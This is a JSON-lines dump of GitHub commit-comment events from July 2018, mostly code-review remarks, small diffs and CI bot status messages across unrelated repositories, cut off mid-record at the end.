{"id":"7964370412","type":"CommitCommentEvent","actor":{"login":"Rodenastyle"},"repo":{"name":"Rodenastyle/stream-parser"},"payload":{"comment":{"id":29705490,"position":null,"line":null,"path":null,"commit_id":"6d30b0a5996eb3aa1eac1f13b91ad1c91cac4a6b","created_at":"2018-07-13T21:10:26Z","updated_at":"2018-07-13T21:10:26Z","author_association":"OWNER","body":"Solves #1 "}},"created_at":"2018-07-13T21:10:26Z"}
{"id":"7964372152","type":"CommitCommentEvent","actor":{"login":"saikrishna321"},"repo":{"name":"saikrishna321/AppiumTestDistribution"},"payload":{"comment":{"id":29705496,"position":34,"line":31,"path":"src/main/java/com/appium/utils/Retry.java","commit_id":"76c144b9b907b42c4d2c77e787ee30c127f1e6ff","created_at":"2018-07-13T21:10:55Z","updated_at":"2018-07-13T21:10:55Z","author_association":"OWNER","body":"@SrinivasanTarget this block is very much needed as we can specify @RetryCount to specific TestMethod which overrides the parent value from config.properties"}},"created_at":"2018-07-13T21:10:55Z"}
{"id":"7964377299","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29705504,"position":5,"line":4,"path":"lesson4/train.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T21:12:17Z","updated_at":"2018-07-13T21:12:17Z","author_association":"NONE","body":"Тип нужно передать, потому-что получение этого типа от поезда одинаково. Значит получение типа следует вынести в суперкласс. А вот задание типа, уже зависит от типа создаваемого поезда. Мы хотим что-б работало так:\r\n```\r\n# создание поезда\r\nCargoTrain.new(\"number-1\")\r\n# любой поезд знает свои тип\r\n@trains.last.type\r\n```\r\nОбщий код - в суперкласс, уникальный код - в подклассы."}},"created_at":"2018-07-13T21:12:17Z"}
{"id":"7964379498","type":"CommitCommentEvent","actor":{"login":"andrewinsoul"},"repo":{"name":"andrewinsoul/MyDiary"},"payload":{"comment":{"id":29705509,"position":null,"line":null,"path":null,"commit_id":"b94c52427719f79669ec6e7be67d5c00767694b0","created_at":"2018-07-13T21:12:51Z","updated_at":"2018-07-13T21:12:51Z","author_association":"OWNER","body":"I am making use of a plugin on Vs code called rest client.  It's a simulation of postman. Rest client requires me to create files with http extension and the ones I created was stored in a local folder http which is what I added to gitignore "}},"created_at":"2018-07-13T21:12:51Z"}
{"id":"7964391785","type":"CommitCommentEvent","actor":{"login":"kernelpaniclite"},"repo":{"name":"stripydog/kplex"},"payload":{"comment":{"id":29705535,"position":45,"line":28,"path":"kplex.init","commit_id":"67b70f6a6955a621178ae722dab82a3ebfa6c79b","created_at":"2018-07-13T21:15:58Z","updated_at":"2018-07-13T21:15:58Z","author_association":"NONE","body":"Small issue: \"-r\" should be \"-p\""}},"created_at":"2018-07-13T21:15:58Z"}
{"id":"7964393055","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"Alexander-Miller/pfuture"},"payload":{"comment":{"id":29705537,"position":13,"line":54,"path":"pfuture.el","commit_id":"9f8bfcefb00e9d3b40ecb37498f0e4ee1c19e9c9","created_at":"2018-07-13T21:16:17Z","updated_at":"2018-07-13T21:16:17Z","author_association":"NONE","body":"BTW, it occurred to me, I think maybe this pattern needs to be:\r\n```el\r\n((or `(,_ . ,_)\r\n             `(,_))\r\n         fn)\r\n```\r\nSo that the macro can be called like (using the example from earlier):\r\n```el\r\n(defmacro argh (fn)\r\n  `(let ((foo 'foo))\r\n     ,(pcase fn\r\n        (`(function ,fn) `(,fn foo))\r\n        ((or `(,_ . ,_)\r\n             `(,_))\r\n         fn)\r\n        (fn `(funcall ,fn foo)))))\r\n\r\n(argh (ignore))  ;=> nil\r\n```\r\nWhat do you think?"}},"created_at":"2018-07-13T21:16:17Z"}
{"id":"7964399151","type":"CommitCommentEvent","actor":{"login":"hummingly"},"repo":{"name":"kaj/rust-pdf"},"payload":{"comment":{"id":29705550,"position":null,"line":null,"path":null,"commit_id":"435609621b76067ada7ec3fa35d4f624ac5d1786","created_at":"2018-07-13T21:17:55Z","updated_at":"2018-07-13T21:17:55Z","author_association":"NONE","body":"There is a typo: wich -> which."}},"created_at":"2018-07-13T21:17:55Z"}
{"id":"7964400077","type":"CommitCommentEvent","actor":{"login":"tpruvot"},"repo":{"name":"216k155/lux"},"payload":{"comment":{"id":29705555,"position":null,"line":null,"path":null,"commit_id":"85eafdd38d223685a1c06d0259b307fdf915be65","created_at":"2018-07-13T21:18:11Z","updated_at":"2018-07-13T21:18:11Z","author_association":"COLLABORATOR","body":"this commit breaks both 1.65 and 1.66"}},"created_at":"2018-07-13T21:18:11Z"}
{"id":"7964403006","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29705560,"position":null,"line":null,"path":null,"commit_id":"83bd7dafb6ee959159b2e6f954d9666887790135","created_at":"2018-07-13T21:19:00Z","updated_at":"2018-07-13T21:19:00Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-789](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-789).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-789-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-13T21:19:00Z"}
{"id":"7964408756","type":"CommitCommentEvent","actor":{"login":"varunmaitreya"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29705571,"position":null,"line":null,"path":null,"commit_id":"976234e6508211023e3c908af5be6112fc01315e","created_at":"2018-07-13T21:20:37Z","updated_at":"2018-07-13T21:20:37Z","author_association":"OWNER","body":"https://github.com/perma-id/w3id.org/pull/1047 updated url and created a pull request. \r\nSample ontology model needs an update. Not included into present version as it is a minor fix. Vocabulary is perfect and needs no change."}},"created_at":"2018-07-13T21:20:37Z"}
{"id":"7964409011","type":"CommitCommentEvent","actor":{"login":"jyli7"},"repo":{"name":"trose618/BlackJack"},"payload":{"comment":{"id":29705572,"position":28,"line":28,"path":"BlackJack.rb","commit_id":"a25d22edfccdd9c009ec2f1a4e48b2b51b11f1b4","created_at":"2018-07-13T21:20:41Z","updated_at":"2018-07-13T21:20:41Z","author_association":"COLLABORATOR","body":"Why not have this be an instance variable that lives within initialize? I'd also not call it deck, since that's your class name. I'd instead call it @cards (or something)."}},"created_at":"2018-07-13T21:20:41Z"}
{"id":"7964409413","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"ViktorShvydrik/js"},"payload":{"comment":{"id":29705573,"position":17,"line":17,"path":"eleventhLesson/eleventhLesson.js","commit_id":"381c5cbe65855b965fa2a28a0429646a66408ad4","created_at":"2018-07-13T21:20:47Z","updated_at":"2018-07-13T21:20:47Z","author_association":"NONE","body":"Функция отрабатывает корректно. Но меня очень смущает условие `while(true)`. Лучше так не делать, в некоторых браузерах может сработать некорректно, т.к. это по сутит бесконечный цикл (infinity loop)."}},"created_at":"2018-07-13T21:20:47Z"}
{"id":"7964411769","type":"CommitCommentEvent","actor":{"login":"jyli7"},"repo":{"name":"trose618/BlackJack"},"payload":{"comment":{"id":29705580,"position":31,"line":31,"path":"BlackJack.rb","commit_id":"a25d22edfccdd9c009ec2f1a4e48b2b51b11f1b4","created_at":"2018-07-13T21:21:24Z","updated_at":"2018-07-13T21:21:24Z","author_association":"COLLABORATOR","body":"You should put this into a method, e.g. buildDeck\r\n\r\nThat way, people can read your code and see quickly, at a high level, what it's doing."}},"created_at":"2018-07-13T21:21:24Z"}
{"id":"7964415740","type":"CommitCommentEvent","actor":{"login":"jyli7"},"repo":{"name":"trose618/BlackJack"},"payload":{"comment":{"id":29705587,"position":33,"line":33,"path":"BlackJack.rb","commit_id":"a25d22edfccdd9c009ec2f1a4e48b2b51b11f1b4","created_at":"2018-07-13T21:22:30Z","updated_at":"2018-07-13T21:22:30Z","author_association":"COLLABORATOR","body":"You should favor keyword arguments over positional arguments, so that it's easy to know what the arguments are for, at a glance.\r\n\r\nhttps://robots.thoughtbot.com/ruby-2-keyword-arguments#keyword-arguments-vs-positional-arguments"}},"created_at":"2018-07-13T21:22:30Z"}
{"id":"7964417202","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"ViktorShvydrik/js"},"payload":{"comment":{"id":29705591,"position":3,"line":3,"path":"eleventhLesson/eleventhLesson.js","commit_id":"381c5cbe65855b965fa2a28a0429646a66408ad4","created_at":"2018-07-13T21:22:54Z","updated_at":"2018-07-13T21:22:54Z","author_association":"NONE","body":"В этой функции можно сделать намного короче. Почему бы сразу не возвращать результат сравнения? `return arr.indexOf(el) != -1;\r\n`"}},"created_at":"2018-07-13T21:22:54Z"}
{"id":"7964418957","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29705594,"position":101,"line":101,"path":"MTA10/core/CDirect3DHook9.cpp","commit_id":"86357e2ba63ac1f0dd2c5b35bb0b2cc83c339553","created_at":"2018-07-13T21:23:24Z","updated_at":"2018-07-13T21:23:24Z","author_association":"MEMBER","body":"this line was removed in https://github.com/multitheftauto/mtasa-blue/commit/feaf5730c90491def48a51468180979da7cf1665"}},"created_at":"2018-07-13T21:23:24Z"}
{"id":"7964420301","type":"CommitCommentEvent","actor":{"login":"VHarasymiv"},"repo":{"name":"VHarasymiv/VHarasymiv.github.io"},"payload":{"comment":{"id":29705600,"position":null,"line":null,"path":null,"commit_id":"bd791d75d341a80b21388b48b4e1c576493edde8","created_at":"2018-07-13T21:23:48Z","updated_at":"2018-07-13T21:23:48Z","author_association":"OWNER","body":"#Pu;;"}},"created_at":"2018-07-13T21:23:48Z"}
{"id":"7964420912","type":"CommitCommentEvent","actor":{"login":"VHarasymiv"},"repo":{"name":"VHarasymiv/VHarasymiv.github.io"},"payload":{"comment":{"id":29705601,"position":null,"line":null,"path":null,"commit_id":"bd791d75d341a80b21388b48b4e1c576493edde8","created_at":"2018-07-13T21:23:58Z","updated_at":"2018-07-13T21:23:58Z","author_association":"OWNER","body":"######Request"}},"created_at":"2018-07-13T21:23:58Z"}
{"id":"7964439009","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705654,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-13T21:28:58Z","updated_at":"2018-07-13T21:28:58Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1686 of 1686 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-13T21:28:58Z"}
{"id":"7964440212","type":"CommitCommentEvent","actor":{"login":"MemZ14"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29705656,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-13T21:29:19Z","updated_at":"2018-07-13T21:29:19Z","author_association":"NONE","body":"for some reason, my cheat after this new update has stopped working. not sure if its the code or the offsets, it wouldn't make sense if it was the code because 1 week ago the cheat worked fine and they didn't modify the source engine so i am kinda confused if it's my offsets or the code.\r\nthe cheat is also external might I add and I am using fprocess,runprocess(); to obtain read-write access"}},"created_at":"2018-07-13T21:29:19Z"}
{"id":"7964441731","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29705657,"position":12,"line":373,"path":"builtin/rebase.c","commit_id":"2c8e37cc5b426ac04e0c6846d7c0cf255c9c9c48","created_at":"2018-07-13T21:29:46Z","updated_at":"2018-07-13T21:29:46Z","author_association":"NONE","body":"I ran `t3400-rebase.sh` and noticed that it failed to detect a dirty worktree. The reason is mentioned above the function declaraion of `require_clean_work_tree()` in `wt-status.h`: we need to make sure that we read the index first. So this fixes it here:\r\n\r\n```diff\r\ndiff --git a/builtin/rebase.c b/builtin/rebase.c\r\nindex 53d591e3c3c..9f1d6813e12 100644\r\n--- a/builtin/rebase.c\r\n+++ b/builtin/rebase.c\r\n@@ -803,6 +808,9 @@ int cmd_rebase(int argc, const char **argv, const char *prefix)\r\n \t} else\r\n \t\tBUG(\"unexpected number of arguments left to parse\");\r\n \r\n+\tif (read_index(the_repository->index) < 0)\r\n+\t\tdie(_(\"could not read index\"));\r\n+\r\n \tif (require_clean_work_tree(\"rebase\",\r\n \t\t\t\t    _(\"Please commit or stash them.\"), 1, 1)) {\r\n \t\tret = 1;\r\n```\r\n\r\nPlease amend this commit accordingly."}},"created_at":"2018-07-13T21:29:46Z"}
{"id":"7964443885","type":"CommitCommentEvent","actor":{"login":"NHDaly"},"repo":{"name":"NHDaly/PackageCompiler.jl"},"payload":{"comment":{"id":29705665,"position":28,"line":28,"path":"examples/program_v07.c","commit_id":"3a536a206df565a03982e9c684936a3877705488","created_at":"2018-07-13T21:30:21Z","updated_at":"2018-07-13T21:30:21Z","author_association":"OWNER","body":"This line the main change from https://github.com/JuliaLang/PackageCompiler.jl/blob/master/examples/program.c"}},"created_at":"2018-07-13T21:30:21Z"}
{"id":"7964444054","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29705666,"position":6,"line":6,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T21:30:24Z","updated_at":"2018-07-13T21:30:24Z","author_association":"NONE","body":"```\r\nVladFiliucov 13 hours ago\r\nНу нужно делать инстэнс переменные из того, что можно вычислить из других инстэнс переменных. \r\n```\r\nТем самым мы вводим потенциальное раздвоение данных. То есть тогда первую станцию можно получить из ```@stations``` и из ```@first_station```. Если при изменении кода, будет изменена одна переменная, но не изменена вторая - это приведет к не правильной работе программы. Лучше иметь один источник правды.   И лучше иметь абсолютный минимум кода в конструкторе, потому-что часто для инициализации объекта нужно иметь гораздо больше полей (в инициализацию потом заедет и валидация), так-что, чем меньше - тем лучше."}},"created_at":"2018-07-13T21:30:24Z"}
{"id":"7964445371","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29705667,"position":null,"line":null,"path":null,"commit_id":"9fae3e16fd49263658dcdd1ff5a706b7c742a0e9","created_at":"2018-07-13T21:30:46Z","updated_at":"2018-07-13T21:30:46Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-1](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-13T21:30:46Z"}
{"id":"7964445665","type":"CommitCommentEvent","actor":{"login":"rimistri1"},"repo":{"name":"omnirom/android_bootable_recovery"},"payload":{"comment":{"id":29705668,"position":31,"line":244,"path":"tests/component/install_test.cpp","commit_id":"00d5757186c279ba5e8a52a6f5209be3e7152025","created_at":"2018-07-13T21:30:51Z","updated_at":"2018-07-13T21:30:51Z","author_association":"NONE","body":"![m e-yaagqaa mh y0j7soy-4mylhoio original_148945521](https://user-images.githubusercontent.com/37022036/42714849-c4168d0a-86f4-11e8-9192-b8bb0903d512.jpg)\r\n"}},"created_at":"2018-07-13T21:30:51Z"}
{"id":"7964450413","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"prertik/git"},"payload":{"comment":{"id":29705671,"position":185,"line":463,"path":"builtin/rebase.c","commit_id":"0ee74fc2dc22c94e5c0187648b757ccf5c9eca40","created_at":"2018-07-13T21:32:12Z","updated_at":"2018-07-13T21:32:12Z","author_association":"NONE","body":"The `has_unstaged_changes()` function expects the caller to take care of loading the index (there is a hint at the end of `wt-status.h`, just before the function declaration of this function). So I need this here to make it work:\r\n\r\n```diff\r\ndiff --git a/builtin/rebase.c b/builtin/rebase.c\r\n--- a/builtin/rebase.c\r\n+++ b/builtin/rebase.c\r\n@@ -620,6 +623,8 @@\r\n                        die(_(\"Cannot read HEAD\"));\r\n\r\n                fd = hold_locked_index(&lock_file, 0);\r\n+               if (read_index(the_repository->index) < 0)\r\n+                       die(_(\"could not read index\"));\r\n                refresh_index(the_repository->index, REFRESH_QUIET, NULL, NULL,\r\n                              NULL);\r\n                if (0 <= fd)\r\n```\r\n\r\nPlease amend this commit accordingly."}},"created_at":"2018-07-13T21:32:12Z"}
{"id":"7964451086","type":"CommitCommentEvent","actor":{"login":"noc0"},"repo":{"name":"fumibako/script"},"payload":{"comment":{"id":29705674,"position":null,"line":null,"path":null,"commit_id":"7bd0c0614129d278e33619959ad4a81f92fdb797","created_at":"2018-07-13T21:32:24Z","updated_at":"2018-07-13T21:32:24Z","author_association":"CONTRIBUTOR","body":"◆B4nFWraU42さん、ご確認をありがとうございます。\r\n模様他についてはお任せくださるということで、こちらで調整いたします。\r\n作者様のイメージに合うかどうかが一番大切だと考えています。物語を自分にできる範囲で深く読み込んでいるつもりではありますが、私のイメージはなかなか作者様のイメージに遠く及ばない、ともよく感じます。(テストプレイしていても、毎回、もしかしてここはこういう解釈も…？！など新鮮に感じるところがあり、それも楽しみの一つです。深く練られた物語を味わう醍醐味のひとつだとも思いますが、まだ読み込みが足りないのかも…とも反省するところです）\r\n最終調整は、実際に組み込んでから◆B4nFWraU42さんのご意見を伺って調整させていただけたらと思います。\r\n\r\n進捗報告：ピンク、緑ともに通常ポーズでの模様作成がひと段落しました。これから袖差分の作成に入ります。袖差分ベース作成からはじめます。"}},"created_at":"2018-07-13T21:32:24Z"}
{"id":"7964451873","type":"CommitCommentEvent","actor":{"login":"jyli7"},"repo":{"name":"trose618/BlackJack"},"payload":{"comment":{"id":29705675,"position":238,"line":238,"path":"BlackJack.rb","commit_id":"a25d22edfccdd9c009ec2f1a4e48b2b51b11f1b4","created_at":"2018-07-13T21:32:36Z","updated_at":"2018-07-13T21:32:36Z","author_association":"COLLABORATOR","body":"What's going on here? It's very hard to understand this code. You should probably break it up into sensible methods, so that it's easy to understand, at a glance."}},"created_at":"2018-07-13T21:32:36Z"}
{"id":"7964452134","type":"CommitCommentEvent","actor":{"login":"jyli7"},"repo":{"name":"trose618/BlackJack"},"payload":{"comment":{"id":29705677,"position":null,"line":null,"path":null,"commit_id":"a25d22edfccdd9c009ec2f1a4e48b2b51b11f1b4","created_at":"2018-07-13T21:32:41Z","updated_at":"2018-07-13T21:32:41Z","author_association":"COLLABORATOR","body":"Good job overall! Nice to get something working. Writing blackjack isn't easy!\r\n\r\nSome high level comments, in addition to what I've put inline:\r\n\r\n* The actual user experience for this game is not great. I shouldn't have to type 'help' to figure out what commands are valid. Instead, the game should tell the user what he/she can type next. Also, you should always print out the user's cards.\r\n\r\n* In general, always think about creating useful, readable abstractions. That is, if you look at 3+ lines of code and it's not obvious what it does at a glance, consider factoring it into a method. You should be able to look at code and have it basically read like English. Then, if you want to know HOW a method works, you can look at the method definition. For example, it's very hard to understand what's going on in the code that runs when the user does not bust.\r\n\r\n* Always try to avoid repeating yourself / code duplication.\r\n\r\n"}},"created_at":"2018-07-13T21:32:41Z"}
{"id":"7964452378","type":"CommitCommentEvent","actor":{"login":"ycho"},"repo":{"name":"tdaede/rav1e"},"payload":{"comment":{"id":29705678,"position":51,"line":823,"path":"src/lib.rs","commit_id":"521a40050e58b5c57ead7c8038176c365e6a86ca","created_at":"2018-07-13T21:32:45Z","updated_at":"2018-07-13T21:32:45Z","author_association":"NONE","body":"So, Feb version of OBU writes the payload length in front of OBU? That is weird....!?"}},"created_at":"2018-07-13T21:32:45Z"}
{"id":"7964454055","type":"CommitCommentEvent","actor":{"login":"rimistri1"},"repo":{"name":"omnirom/android_bootable_recovery"},"payload":{"comment":{"id":29705682,"position":110,"line":340,"path":"tests/component/install_test.cpp","commit_id":"00d5757186c279ba5e8a52a6f5209be3e7152025","created_at":"2018-07-13T21:33:14Z","updated_at":"2018-07-13T21:33:14Z","author_association":"NONE","body":"android_bootable_recovery/install.h"}},"created_at":"2018-07-13T21:33:14Z"}
{"id":"7964454254","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"Riba0017/javascript"},"payload":{"comment":{"id":29705683,"position":42,"line":42,"path":"eleventhLesson.js","commit_id":"4cebddb194386c34272756f57fe5351825dfc5b3","created_at":"2018-07-13T21:33:17Z","updated_at":"2018-07-13T21:33:17Z","author_association":"NONE","body":"Функция работает некорректно. \r\n`console.log(transformString('my naMe is Alex','name', 'coolName'));` должно возвращать `'my coolName is **A**lex'` а возвращает `'my coolName is **a**lex'`"}},"created_at":"2018-07-13T21:33:17Z"}
{"id":"7964456784","type":"CommitCommentEvent","actor":{"login":"ycho"},"repo":{"name":"tdaede/rav1e"},"payload":{"comment":{"id":29705691,"position":44,"line":816,"path":"src/lib.rs","commit_id":"521a40050e58b5c57ead7c8038176c365e6a86ca","created_at":"2018-07-13T21:34:00Z","updated_at":"2018-07-13T21:34:00Z","author_association":"NONE","body":"So, Feb version of OBU writes the payload length in front of OBU? That is weird....!?"}},"created_at":"2018-07-13T21:34:00Z"}
{"id":"7964462039","type":"CommitCommentEvent","actor":{"login":"havok2063"},"repo":{"name":"sdss/marvin"},"payload":{"comment":{"id":29705708,"position":null,"line":null,"path":null,"commit_id":"6ed29b935d3efb553460eaabecfee05b5b0084d2","created_at":"2018-07-13T21:35:30Z","updated_at":"2018-07-13T21:35:30Z","author_association":"CONTRIBUTOR","body":"Yeah, I don't like that either.  We can get rid of the Feature Request template.  Maybe that will take it back to one click.  "}},"created_at":"2018-07-13T21:35:30Z"}
{"id":"7964470048","type":"CommitCommentEvent","actor":{"login":"albfan"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29705719,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-13T21:37:43Z","updated_at":"2018-07-13T21:37:43Z","author_association":"COLLABORATOR","body":"@izzysoft, tags are fixed(v3.0.0 and v4.0.0)\r\n\r\nPush to a gitlab.com repo should be an inmediate task.\r\n\r\n@JonhMH I can rework whatever doc is needed after that"}},"created_at":"2018-07-13T21:37:43Z"}
{"id":"7964474811","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705730,"position":null,"line":null,"path":null,"commit_id":"ea744ee28374298283a237e23a9837d667abe50a","created_at":"2018-07-13T21:39:06Z","updated_at":"2018-07-13T21:39:06Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2935 of 2935 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T21:39:06Z"}
{"id":"7964476360","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"NewAramas/JsRepository"},"payload":{"comment":{"id":29705733,"position":2,"line":2,"path":"eleventhLesson/script.js","commit_id":"79ae2dc68df07099e35bb7685cc47a6384edac60","created_at":"2018-07-13T21:39:34Z","updated_at":"2018-07-13T21:39:34Z","author_association":"NONE","body":"Функция должна ВОЗВРАЩАТЬ. За это в функциях отвечает оператор `return`"}},"created_at":"2018-07-13T21:39:34Z"}
{"id":"7964477683","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29705737,"position":null,"line":null,"path":null,"commit_id":"72c2980e06ff2dfcead272264a115b0995c36539","created_at":"2018-07-13T21:39:54Z","updated_at":"2018-07-13T21:39:54Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-61](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#ci-61).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-61-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-13T21:39:54Z"}
{"id":"7964478208","type":"CommitCommentEvent","actor":{"login":"seanmcneil"},"repo":{"name":"openid/AppAuth-iOS"},"payload":{"comment":{"id":29705740,"position":2,"line":1,"path":"Examples/Example-iOS_ObjC-Carthage/Cartfile","commit_id":"70c1d55c4955a2535870ac9d8c3b555820ab7a99","created_at":"2018-07-13T21:40:02Z","updated_at":"2018-07-13T21:40:02Z","author_association":"NONE","body":"May want to fix this"}},"created_at":"2018-07-13T21:40:02Z"}
{"id":"7964480250","type":"CommitCommentEvent","actor":{"login":"MakcStudio"},"repo":{"name":"dotabuff/manta"},"payload":{"comment":{"id":29705746,"position":null,"line":null,"path":null,"commit_id":"7794dd00566c62c59b0edd07693c87db85237217","created_at":"2018-07-13T21:40:32Z","updated_at":"2018-07-13T21:40:32Z","author_association":"NONE","body":"Please see\r\n\r\np.Callbacks.OnCMsgSource1LegacyGameEvent(func(event *dota.CMsgSource1LegacyGameEvent) error {\r\n    log.Printf(\"Event: %s\\n\", event.String()); return nil\r\n  })\r\n\r\nReturns only \"eventid: 323\" \r\n\r\nBecause of this does not work \r\nparser.OnGameEvent(\"dota_combatlog\", func(m *GameEvent) error { return nil })\r\n\r\nPls help)"}},"created_at":"2018-07-13T21:40:32Z"}
{"id":"7964481351","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"NewAramas/JsRepository"},"payload":{"comment":{"id":29705748,"position":22,"line":22,"path":"eleventhLesson/script.js","commit_id":"79ae2dc68df07099e35bb7685cc47a6384edac60","created_at":"2018-07-13T21:40:52Z","updated_at":"2018-07-13T21:40:52Z","author_association":"NONE","body":"Использовать для таких комбинированных выводов (строка + js) интерполяцию (строки в ES6 с кавычками вида \r\n ` `)! \r\n"}},"created_at":"2018-07-13T21:40:52Z"}
{"id":"7964481359","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29705749,"position":null,"line":null,"path":null,"commit_id":"76449485a5fca3b3e82fcae89e99a05f16111f39","created_at":"2018-07-13T21:40:52Z","updated_at":"2018-07-13T21:40:52Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-2](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-13T21:40:52Z"}
{"id":"7964482108","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29705752,"position":null,"line":null,"path":null,"commit_id":"394b3a1d984e8121ae1174f3f269f66b82db735b","created_at":"2018-07-13T21:41:05Z","updated_at":"2018-07-13T21:41:05Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-6](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-6).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-6-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T21:41:05Z"}
{"id":"7964490108","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ByxNilsGFX/CloudSigns"},"payload":{"comment":{"id":29705767,"position":null,"line":null,"path":null,"commit_id":"f514b76e3335d61e7e3ea10ac25f69a75a9e98f8","created_at":"2018-07-13T21:43:26Z","updated_at":"2018-07-13T21:43:26Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\n.poggit.yml does not contain the projects attribute or has an invalid\nformat\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ByxNilsGFX/CloudSigns/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `c543e830-86e5-11e8-9c43-71f79a2988a4`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on 